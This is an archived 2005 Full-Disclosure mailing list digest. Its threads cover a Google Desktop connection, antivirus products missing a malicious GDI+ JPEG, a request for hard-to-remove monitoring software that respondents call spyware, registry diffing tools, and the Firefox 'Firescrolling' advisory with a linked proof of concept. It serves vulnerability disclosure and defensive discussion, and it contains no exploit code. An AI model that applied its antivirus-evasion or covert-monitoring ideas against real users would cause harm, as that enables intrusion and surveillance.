[Full-Disclosure] Re: Strange connection from google desktop search

[Steve R]

--- RandallM <[EMAIL PROTECTED]> wrote:
> The following established connection was noticed:
>  TCPxxx.xxx.x.xx:2869  64.233.187.104:80
>  ESTABLISHED 2824
> 
> Process viewer reported it to be:
> Googledesktop.exe
> 
> SamSpade says:
> 
> 03/05/05 21:54:31 whois  64.233.187.104
> I don't recognise any domain in 187.104, trying
> internic
> 
> whois -h whois.internic.net 187.104 ...
> 
> Whois Server Version 1.3
> 
> Domain names in the .com and .net domains can now be
> registered
> with many different competing registrars. Go to
> http://www.internic.net
> for detailed information.
> 
> No match for "187.104".
> 
> 03/05/05 22:07:21 finger @ 64.233.187.104
> finger @ 64.233.187.104 failed, no such host
> 
> 03/05/05 22:07:47 dns  64.233.187.104
> No DNS for this address
> (host doesn't exist)

FYI,

Output from ARIN WHOIS
Search results for: 64.233.187.104

OrgName:Google Inc. 
OrgID:  GOGL
Address:2400 E. Bayshore Parkway
City:   Mountain View
StateProv:  CA
PostalCode: 94043
Country:US

NetRange:   64.233.160.0 - 64.233.191.255 
CIDR:   64.233.160.0/19 
NetName:GOOGLE
NetHandle:  NET-64-233-160-0-1
Parent: NET-64-0-0-0-0
NetType:Direct Allocation
NameServer: NS1.GOOGLE.COM
NameServer: NS2.GOOGLE.COM
Comment:
RegDate:2003-08-18
Updated:2004-03-05

TechHandle: ZG39-ARIN
TechName:   Google Inc. 
TechPhone:  +1-650-318-0200
TechEmail:  [EMAIL PROTECTED] 

OrgTechHandle: ZG39-ARIN
OrgTechName:   Google Inc. 
OrgTechPhone:  +1-650-318-0200
OrgTechEmail:  [EMAIL PROTECTED]

# ARIN WHOIS database, last updated 2005-03-05 19:10
# Enter ? for additional hints on searching ARIN's
WHOIS database.


Send instant messages to your online friends http://uk.messenger.yahoo.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure Digest, Vol 4, Issue 11

[RandallM]

 
Andrey,
Just to add to the concern you bring up is what VirusTotal also shows on the
"Detection failures".
http://www.virustotal.com/flash/graficas/grafica4_en.html

Of course for me that's job security but none the less its pitiful. And now
in steps Microsoft with "Billions" under its belt and I'll bet the odds
won't change much. That's where I get really confused.
We know that costs go in to the billions when networks go down due to
infections. I know of no one but the parity actors for AOL who welcome
infections. I'm just dumb founded on the abilities of virus companies to
battle this. 

I'm finding that my preconceived label of who the virus writers are and look
like are rapidly being changed. I used to envision this lad with a tattered
def leopard shirt sitting with an old laptop in the wee early dawn finishing
up his code and getting ready to test it on the old grey Pentium box in the
corner.

Is this the guy beating the pants off the billion dollar companies?

I would also like to add that what you've done is very impressive. I'm
reading your paper now. I could and will never be able do such so thanks for
this well written piece. Please tell me your not wearing a def leopard
t-shirt!

thank you
Randall M

"If we ever forget that we're one nation under God, then we will be a nation
gone under." 
- Ronald Reagan
_

 


Andrey so correctly acknowledged:
--

Message: 8
Date: Fri,  4 Mar 2005 15:03:10 -0600
From: Andrey Bayora <[EMAIL PROTECTED]>
Subject: [Full-Disclosure] Bypass of 22 Antivirus software with GDI+
bug exploit Mutations - part 2
To: full-disclosure@lists.netsys.com
Cc: bugtraq@securityfocus.com
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=ISO-8859-1


The first part is here:
http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html

First, this post isnt about how dangerous GDI+ bug or malicious JPEG
image, but how good is your antivirus software.

The issue is: only 1 out of 23 tested antivirus software can detect
malicious JPEG image (after 6 month from the public disclosure date).

Here is the link to results, JPEG file and my paper (GCIH practical)
that describes how to create this one:
http://www.hiddenbit.org/jpeg.htm

This one vendor (Symantec) that can detect it, obviously do it with the
heuristic detection (I dont work for them and didnt send them any
file, moreover I know cases when Symantec didnt detect a virus that
other vendors do).
ClamAV antivirus detected this JPEG file 4 month ago, but strangely
cant detect it now.
What happened?
What about 22 antivirus software vendors that miss this malicious JPEG?
The pattern or problem in these JPEG files is known and still many
antivirus software vendors miss it, did it can represent the quality of
heuristic engines?

OK, we know that any antivirus software can provide 100% protection

P.S.  After my first post (October 14,2004) about this problem  all
antivirus software vendors added detection to the demo file provided by
me in couple of hours. Sadly for me, but it seems that they prefer
playing cat and mouse and not improve heuristic engines

Regards,
Andrey Bayora.
CISSP, GCIH

-

And so ends his thoughts




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Bypass of 22 Antivirus software with GDI+ bug exploit Mutations - part 2

["Vincent DUVERNET (Nolmë Informatique)"]

Symantec found something that other editor didn't ? Whoaw, impressive 
for a software which let go throw 700 malwares on PC ;p

About Panda Software version, you've used on old version of Internet 
Security 2004 which is actually : 8.05.02 (don't found anything too)
Internet security 2005 is : 9.01.02

Andrey Bayora wrote:
The first part is here:
http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html
First, this post isn’t about “how dangerous GDI+ bug or malicious JPEG
image”, but “how good” is your antivirus software.
The issue is: only 1 out of 23 tested antivirus software can detect
malicious JPEG image (after 6 month from the public disclosure date).
Here is the link to results, JPEG file and my paper (GCIH practical)
that describes how to create this one:
http://www.hiddenbit.org/jpeg.htm
This one vendor (Symantec) that can detect it, obviously do it with the
“heuristic” detection (I don’t work for them and didn’t send them any
file, moreover I know cases when Symantec didn’t detect a virus that
“other” vendors do).
ClamAV antivirus detected this JPEG file 4 month ago, but strangely
can’t detect it now.
What happened?
What about 22 antivirus software vendors that miss this malicious JPEG?
The pattern or problem in these JPEG files is known and still many
antivirus software vendors miss it, did it can represent the quality of
heuristic engines?
OK, we know that any antivirus software can provide 100% protection…
P.S.  After my first post (October 14,2004) about this problem – all
antivirus software vendors added detection to the demo file provided by
me in couple of hours. Sadly for me, but it seems that they prefer
“playing cat and mouse” and not improve heuristic engines…
Regards,
Andrey Bayora.
CISSP, GCIH
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: Windows Registry Analzyer

[Aditya Deshmukh]

>> No, it would be completely useless.  In case you didn't realise, the 
>> registry is not an ASCII text file, it's megabytes of unintelligible
>> binary gibberish.

>Since Windows 2000 regedit exports registry in an Unicode LE 
>text file. Not ASCII but quite intelligible text ;)

Yes but win2k / winxp regedit can export both ASCII as well as UNICODE -
aditya



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] re: Bios Programming...

[Benjamin Franz]

On Fri, 4 Mar 2005, Matt Marooney wrote:
Most Important Requirements:
1. Multi-protocol monitoring (HTTP, FTP, Chat, File sharing,
Newsreaders, etc.)
2. Thin application, does not *noticeably* interfere with normal
computer operation
3. Difficult to remove (disregarding all hardware replacements,
obviously, the person could go get a new computer) without a password
Again, thanks for your helpful input.  I assure you, I am not trying to
create more problems, and I am just like you guys when it comes to
hatred of spy ware.  I've been making a pretty decent living for years
securing people's computers.
What you want is a IDS/firewall/DSL/Cablemodem gateway/router that packet 
sniffs for 'bad stuff' on the wire. They plug their computer into the 
gateway and it connects to the net through it.

That won't stop encrypted traffic, but most anything else should be 
managable. There are probably off-the-shelf systems exactly like that 
already available ("Corporate firewall applicances").

--
Benjamin Franz
"All right, where is the answer? The battle of wits has begun.
It ends when you click and we both serve pages - and find out who is right,
and who is slashdotted." - David Brandt
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] re: Bios Programming...

[Joachim Schipper]

On 14:35 03/04/05 "Matt Marooney" <[EMAIL PROTECTED]> wrote:
> Okay, okay, guys...I  get all of your points.  I'm really glad
> I threw this idea out there  because you all have given me some really
> great reactions.  Thank you Bill  Humphries for your comments; you
> bring up some really good points.
> Now, getting back to  technical conversation, the most important
> requirement for this software is the  multi-protocol monitoring.  As
> some of you have said, this is not going to  be able to be done with a
> small program.
> I don't mind letting  the user know he/she is being monitored, and I
> do not intend for this utility to  be used to spy on someone without
> their knowledge.  I guess I didn't  explain that very well before.
> So, with that out of  the way, I'd like the program to run in the
> background, and be slim enough that  it does not noticeably slow down
> the user's computer.  This is to avoid the  person coming to the
> recovery group and saying, "I had to uninstall the monitor  because it
> is slowing down my computer".
> Most Important  Requirements:
>
> 1. Multi-protocol  monitoring (HTTP, FTP, Chat, File sharing,
> Newsreaders,  etc.)
> 2. Thin application,  does not *noticeably* interfere with normal
> computer  operation
> 3. Difficult to  remove (disregarding all hardware replacements,
> obviously, the person could go  get a new computer) without a
> password Again, thanks for  your helpful input.  I assure you, I am
> not trying to create more problems,  and I am just like you guys when
> it comes to hatred of spy ware.  I've been  making a pretty decent
> living for years securing people's computers.
> --  Matt
>

Of course, a relatively simple solution would involve giving them a free
internet connection, and a modified ADSL/Cable modem... some of the smarter
appliances might be able to do what you describe. Failing that, get
yourself a simple Linux install. Strip it of all shells and run only those
few programs necessary for connection plus Snort. Now get some ISP to
cooperate and only give *you* the connection passwords, then install the
Linux box as a gateway. Anyone unable to crack the Linux box will not be
able to connect via this particular ISP anymore; if you want to be
reasonably secure, make the box ask for a password-protected decryption key
at boot, and make sure only a select few people have these disks. However,
this is burdensome. A simpler alternative is either pinging them or having
them ping you to ensure they are not taken down for protracted periods.

Note that the above scheme can be defeated easily by a knowledgeable user
unless you use the decryption floppy scheme, and even in that case, it is
pretty easy to get a second connection (or encrypt traffic, or whatever)...
but both require some work, hopefully enough to make them reconsider.

This is more up-front, and possibly more effective, than the spyware you
were originally proposing (yes, it is spyware. Your goals may be considered
noble by some, but it would still be spyware).

Also note that the whole idea may, depending on who you ask, be technically
flawed and morally wrong.

 Joachim

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] re: Bios Programming...

[Matt Marooney]

Title: Message



Okay, okay, guys...I 
get all of your points.  I'm really glad I threw this idea out there 
because you all have given me some really great reactions.  Thank you Bill 
Humphries for your comments; you bring up some really good points.  

 
Now, getting back to 
technical conversation, the most important requirement for this software is the 
multi-protocol monitoring.  As some of you have said, this is not going to 
be able to be done with a small program.  
 
I don't mind letting 
the user know he/she is being monitored, and I do not intend for this utility to 
be used to spy on someone without their knowledge.  I guess I didn't 
explain that very well before.  
 
So, with that out of 
the way, I'd like the program to run in the background, and be slim enough that 
it does not noticeably slow down the user's computer.  This is to avoid the 
person coming to the recovery group and saying, "I had to uninstall the monitor 
because it is slowing down my computer".  
 
Most Important 
Requirements:
 
1. Multi-protocol 
monitoring (HTTP, FTP, Chat, File sharing, Newsreaders, 
etc.)
 
2. Thin application, 
does not *noticeably* interfere with normal computer 
operation
 
3. Difficult to 
remove (disregarding all hardware replacements, obviously, the person could go 
get a new computer) without a password
 
Again, thanks for 
your helpful input.  I assure you, I am not trying to create more problems, 
and I am just like you guys when it comes to hatred of spy ware.  I've been 
making a pretty decent living for years securing people's computers.  

 
-- 
Matt
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Windows Registry Analzyer

[Raoul Nakhmanson-Kulish]

Hello, Dave Korn!
No, it would be completely useless.  In case you didn't realise, the 
registry is not an ASCII text file, it's megabytes of unintelligible
binary gibberish.
Since Windows 2000 regedit exports registry in an Unicode LE text file. 
Not ASCII but quite intelligible text ;)

--
Best regards,
Raoul Nakhmanson-Kulish
Elfor Soft Ltd.,
IT Department
http://www.elforsoft.ru/
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: Windows Registry Analzyer

[Ron DuFresne]

does not symantec have a tool in the system works package that does
exactly what he asks, as well as the ability to  role back the reg?


Thanks,

Ron DuFresne



On Thu, 3 Mar 2005, Handy, Mark (IT) wrote:

> Surely you can simply export before and after your action and use
> windiff on the two files
>
> Mark Handy
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Eric
> Windisch
> Sent: 03 March 2005 21:48
> To: Dave Korn
> Cc: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Re: Windows Registry Analzyer
>
> On Thu, 2005-03-03 at 19:39 +, Dave Korn wrote:
> >   No, it would be completely useless.  In case you didn't realise, the
>
> > registry is not an ASCII text file, it's megabytes of unintelligible
> > binary gibberish.
>
> The registry can be exported to ASCII text, edited, and re-imported.
> Have you ever opened a .reg file?
>
>
> --
> Eric Windisch <[EMAIL PROTECTED]>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
>
> NOTICE: If received in error, please destroy and notify sender.  Sender does 
> not waive confidentiality or privilege, and use is prohibited.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: Windows Registry Analzyer

[Handy, Mark (IT)]

Surely you can simply export before and after your action and use
windiff on the two files

Mark Handy

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Eric
Windisch
Sent: 03 March 2005 21:48
To: Dave Korn
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Re: Windows Registry Analzyer

On Thu, 2005-03-03 at 19:39 +, Dave Korn wrote:
>   No, it would be completely useless.  In case you didn't realise, the

> registry is not an ASCII text file, it's megabytes of unintelligible 
> binary gibberish.

The registry can be exported to ASCII text, edited, and re-imported.
Have you ever opened a .reg file?


--
Eric Windisch <[EMAIL PROTECTED]>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html 

 
NOTICE: If received in error, please destroy and notify sender.  Sender does 
not waive confidentiality or privilege, and use is prohibited. 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Windows Registry Analzyer

[Eric Windisch]

On Thu, 2005-03-03 at 19:39 +, Dave Korn wrote:
>   No, it would be completely useless.  In case you didn't realise, the
> registry is not an ASCII text file, it's megabytes of unintelligible binary
> gibberish.

The registry can be exported to ASCII text, edited, and re-imported.
Have you ever opened a .reg file?


-- 
Eric Windisch <[EMAIL PROTECTED]>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Windows Registry Analzyer

[Michael Holstein]

  No, it would be completely useless.  In case you didn't realise, the
registry is not an ASCII text file, it's megabytes of unintelligible binary
gibberish.
True, but there are many programs (the Linux Registry Editor, for 
example) that can open it.

http://developer.berlios.de/projects/tlr-regedit
~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Windows Registry Analzyer

[Michael Holstein]

  Yes, absolutely.  It's called "InCtrl5" and it is *exactly* what you both
want.
Found it :
http://publicdata.home.comcast.net/inctrl5.zip
Also note : this is Plugin #56 on PartPE (which would be quite useful 
for forensics -- you could boot the undisturbed system under BART, grab 
a snapshot, do (x), and grab a comparison snapshot agian under BART -- 
thus avoiding all the other volitle crud that changes between Windows 
reboots).

~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Windows Registry Analzyer

[Dave Korn]

"Cassidy Macfarlane" wrote in message
news:[EMAIL PROTECTED]
> You can, of course, use regmon (sysinternals.com) to monitor the
> registry 'live' while changes are being made, however it sounds like you
> want a product that would analyse the reg, then re-analyse after
> installation, and report on changes.
>
> This would indeed be a handy tool.  Anyone know of anything better than
> regmon for this purpose?

  Yes, absolutely.  It's called "InCtrl5" and it is *exactly* what you both
want.

  You run it once, it snapshots the state of the registry, the entire
contents of your HD, and the content of all the various text files such as
autoexec.bat / win.ini / boot.ini / autoexec.nt (etc).  Then it exits.  You
install whatever it is you wanted to install, then run it again; it takes
another snapshot, then compares the two and makes you a nice report showing
*every* change to your system - registry keys and values added, deleted or
modified; files and directories added, deleted or modified; and any changes
to those startup-script text files.

  It needn't be an install.  It'll tell you whatever differences there are
between the before and after snapshots.  What you do in between those two
times is up to you.  For instance it's quite interesting to take a snapshot,
do a reboot, and run the comparison when the machine boots up again, to see
how much volatile stuff gets changed every time you reboot windows.  Or you
can *un*install something, and by checking against the original installation
report (or by snapshotting, installing, running, then uninstalling the app
straight away before finally getting the comparison report) see if it's left
any traces behind.

  It's incredibly useful.  You'll have to google for it though.  It was
originally given away by some PC magazine or other, but they've restricted
access to their archives now.  See what you can find.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Windows Registry Analzyer

[Dave Korn]

"Eric Windisch" wrote in message news:[EMAIL PROTECTED]
> Perhaps this is just the Unix user in me, but I ask:
> How about just making a copy of the registry on boot (or at intervals)
> and compare it to the last copy?
>
> Note that the following example is untested, but should be mostly
> accurate.

  No, it would be completely useless.  In case you didn't realise, the
registry is not an ASCII text file, it's megabytes of unintelligible binary
gibberish.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: test

[xyberpix]

no way, really?

On Wed, 2 March, 2005 22:37, Roberto Arias said:
> Ignore this message. Testing the maillist
>
> pingywon wrote:
>> not too /Smart/ you are John
>>
>> - Original Message -
>> *From:* John Smart 
>> *To:* full-disclosure@lists.netsys.com
>> 
>> *Sent:* Wednesday, March 02, 2005 1:41 PM
>> *Subject:* [Full-Disclosure] test
>>
>> test
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>


-- 
For security and Opensource news check out:
http://www.xyberpix.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: test

[Roberto Arias]

Ignore this message. Testing the maillist
pingywon wrote:
not too /Smart/ you are John
- Original Message -
*From:* John Smart 
*To:* full-disclosure@lists.netsys.com

*Sent:* Wednesday, March 02, 2005 1:41 PM
*Subject:* [Full-Disclosure] test
test

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Full-Disclosure Digest, Vol 3, Issue 52

[Wiggert de Haan]

L.S.,

Van 28 februari tot en met 4 maart ben ik afwezig. Uw mail mail is aangekomen 
en zal beantwoord worden vanaf 7 maart. 

Voor spoedeisende zaken kunt u terecht bij Gijs van Blokland. 
[EMAIL PROTECTED] / 020-5304323

Wiggert de Haan
ISIZ BV
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] RE: Firescrolling [Firefox 1.0]

[Niek]

On 2/25/2005 6:36 PM +0100, Eric McCarty wrote:
Confirmed Exploit works in Firefox 1.0
OT guy already comfired this, why are we reading your useless email ?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Firescrolling [Firefox 1.0]

[mikx]

Is fixed as part of mfsa 2005-27
http://www.mozilla.org/security/announce/mfsa2005-27.html
mikx
- Original Message - 
From: "Stan Bubrouski" <[EMAIL PROTECTED]>
To: "Beauford, Jason" <[EMAIL PROTECTED]>
Cc: "mikx" <[EMAIL PROTECTED]>; ; 
; <[EMAIL PROTECTED]>
Sent: Friday, February 25, 2005 10:33 PM
Subject: Re: Firescrolling [Firefox 1.0]


looked at: 
http://www.mozilla.org/projects/security/known-vulnerabilities.html

Are you sure its fixed???
-sb
Beauford, Jason wrote:
That sucked.
Fortunately:  http://www.mozilla.org/products/firefox/releases/
jmb
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] Sent: Friday, February 25, 2005 3:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]
__Summary
Remember my Internet Explorer "scrollbar exploit" based on http-equiv's 
"What a Drag"? When will people ever learn that "unusual user
interaction" can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.
__Proof-of-Concept
http://www.mikx.de/firescrolling/
__Status
The exploit is based on multiple vulnerabilities:
bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)
Upgrade to Firefox 1.0.1 or disable javascript.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2005-0527 to this issue.

__Affected Software
Tested with Firefox 1.0 on Windows and Linux (Fedora Core)
__Contact Informations
Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11
mikx


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Firescrolling [Firefox 1.0]

[Stan Bubrouski]

looked at: 
http://www.mozilla.org/projects/security/known-vulnerabilities.html

Are you sure its fixed???
-sb
Beauford, Jason wrote:
That sucked.
Fortunately:  http://www.mozilla.org/products/firefox/releases/
jmb
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 3:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]

__Summary
Remember my Internet Explorer "scrollbar exploit" based on http-equiv's 
"What a Drag"? When will people ever learn that "unusual user
interaction" 
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary 
code by dragging a scrollbar two times.

__Proof-of-Concept
http://www.mikx.de/firescrolling/
__Status
The exploit is based on multiple vulnerabilities:
bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)
Upgrade to Firefox 1.0.1 or disable javascript.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2005-0527 to this issue.

__Affected Software
Tested with Firefox 1.0 on Windows and Linux (Fedora Core)
__Contact Informations
Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11
mikx

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Firescrolling [Firefox 1.0]

[Andrade, Leonardo F. Buonsanti de \(BR - IT Brazil\)]

Yes. It works on Firefox 1.0

-Original Message-
From: Eric McCarty [mailto:[EMAIL PROTECTED] 
Sent: sexta-feira, 25 de fevereiro de 2005 14:37
To: mikx; full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: RE: Firescrolling [Firefox 1.0]

Confirmed Exploit works in Firefox 1.0, however on a side note Microsoft
Anti-spyware prevented the script from executing.



Eric McCarty
Systems Administrator
Internet Security Officer


 

-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 12:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]

__Summary

Remember my Internet Explorer "scrollbar exploit" based on http-equiv's
"What a Drag"? When will people ever learn that "unusual user
interaction" 
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.

__Proof-of-Concept

http://www.mikx.de/firescrolling/

__Status

The exploit is based on multiple vulnerabilities:

bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)

Upgrade to Firefox 1.0.1 or disable javascript.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-0527 to this issue.

__Affected Software

Tested with Firefox 1.0 on Windows and Linux (Fedora Core)

__Contact Informations

Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11

mikx 
 
*Disclaimer:*
Essa mensagem (incluindo qualquer anexo) contem informacoes confidenciais para 
um individuo e fins especificos, e e protegida por lei. Se voce nao e o 
destinatario dessa mensagem, voce deve deleta-la. Qualquer divulgacao, copia ou 
distribuicao dessa mensagem, ou qualquer acao tomada baseada em tal, e 
estritamente proibida.
This message (including any attachments) contains confidential information 
intended for a specific individual and purpose, and is protected by law. If you 
are not the intended recipient, you should delete this message. Any disclosure, 
copying, or distribution of this message, or the taking of any action based on 
it, is strictly prohibited.
This message (including any attachments) contains confidential information 
intended for a specific individual and
purpose, and is protected by law.  If you are not the intended recipient, you 
should delete this message - any
disclosure, copying, or distribution of this message, or the taking of any 
action based on it, is strictly prohibited.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Xfree86 video buffering?

[Esler, Joel CNTR/Sytex]

While I agree that his is an issue.  However I don't feel it's a security issue.  It's more a "fix the driver damn it issue"...  

If you can go through all the trouble to set up a camera, or physically sit and see a few seconds worth of XFree Blink..  You most likely have physical access anyway.  

Physical Access = root.

Fix the driver.  End of story.

On Fri, 2005-02-25 at 22:58 +0300, phased wrote:


If someone has access to your machine, and can make it crash so they can see
what you were doing, someone mentioned this is local infomation disclosure...
they could just look over your shoulder while you were using the machine or 
install a mini camera someplace in the room, zoom in on your monitor and
acheive much better results.

-Original Message-
From: Stan Bubrouski <[EMAIL PROTECTED]>
To: "Riad S. Wahby" <[EMAIL PROTECTED]>
Date: Fri, 25 Feb 2005 13:33:21 -0500
Subject: [Full-Disclosure] Re: Xfree86 video buffering?

> 
> Riad S. Wahby wrote:
> 
> >Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> >  
> >
> >>Umm I didn't offer a solution at all? 
> >>
> >>
> >
> >Are you making a statement or asking a question?
> >
> >  
> >
> Umm more like wondering what you're talking about.
> 
> >>I clearly said I wasn't wise enough to devise a solution for this...
> >>which is why I said I'll leave a solution to the experts...
> >>
> >>
> >
> >It's fairly obvious that you either have to do it at shutdown or at
> >startup.  When else are you going to do it, while the user is viewing
> >the screen?
> >
> >  
> >
> I wasn't making a case for either argument.
> 
> >Also, you seem to have taken my email as a personal attack.  Calm down,
> >dude.  I was participating in a discussion, not holding up a giant "Stan
> >is stupid" sign.
> >
> >  
> >
> Go ahead and hold up a sign doesn't bother me, if it did I wouldn't be 
> posting to public mailling lists.
> But if you think I'm sitting here steaming about it your barking up the 
> wrong tree :-P
> 
> I think you're simply inferring too much from what I'm saying.  That's all.
> 
> Best Regards,
> 
> sb
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html





-- 
Esler, Joel CNTR/Sytex <[EMAIL PROTECTED]>





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Xfree86 video buffering?

[phased]

If someone has access to your machine, and can make it crash so they can see
what you were doing, someone mentioned this is local infomation disclosure...
they could just look over your shoulder while you were using the machine or 
install a mini camera someplace in the room, zoom in on your monitor and
acheive much better results.

-Original Message-
From: Stan Bubrouski <[EMAIL PROTECTED]>
To: "Riad S. Wahby" <[EMAIL PROTECTED]>
Date: Fri, 25 Feb 2005 13:33:21 -0500
Subject: [Full-Disclosure] Re: Xfree86 video buffering?

> 
> Riad S. Wahby wrote:
> 
> >Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> >  
> >
> >>Umm I didn't offer a solution at all? 
> >>
> >>
> >
> >Are you making a statement or asking a question?
> >
> >  
> >
> Umm more like wondering what you're talking about.
> 
> >>I clearly said I wasn't wise enough to devise a solution for this...
> >>which is why I said I'll leave a solution to the experts...
> >>
> >>
> >
> >It's fairly obvious that you either have to do it at shutdown or at
> >startup.  When else are you going to do it, while the user is viewing
> >the screen?
> >
> >  
> >
> I wasn't making a case for either argument.
> 
> >Also, you seem to have taken my email as a personal attack.  Calm down,
> >dude.  I was participating in a discussion, not holding up a giant "Stan
> >is stupid" sign.
> >
> >  
> >
> Go ahead and hold up a sign doesn't bother me, if it did I wouldn't be 
> posting to public mailling lists.
> But if you think I'm sitting here steaming about it your barking up the 
> wrong tree :-P
> 
> I think you're simply inferring too much from what I'm saying.  That's all.
> 
> Best Regards,
> 
> sb
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Firescrolling [Firefox 1.0]

[Beauford, Jason]

That sucked.

Fortunately:  http://www.mozilla.org/products/firefox/releases/

jmb

-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 3:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]


__Summary

Remember my Internet Explorer "scrollbar exploit" based on http-equiv's 
"What a Drag"? When will people ever learn that "unusual user
interaction" 
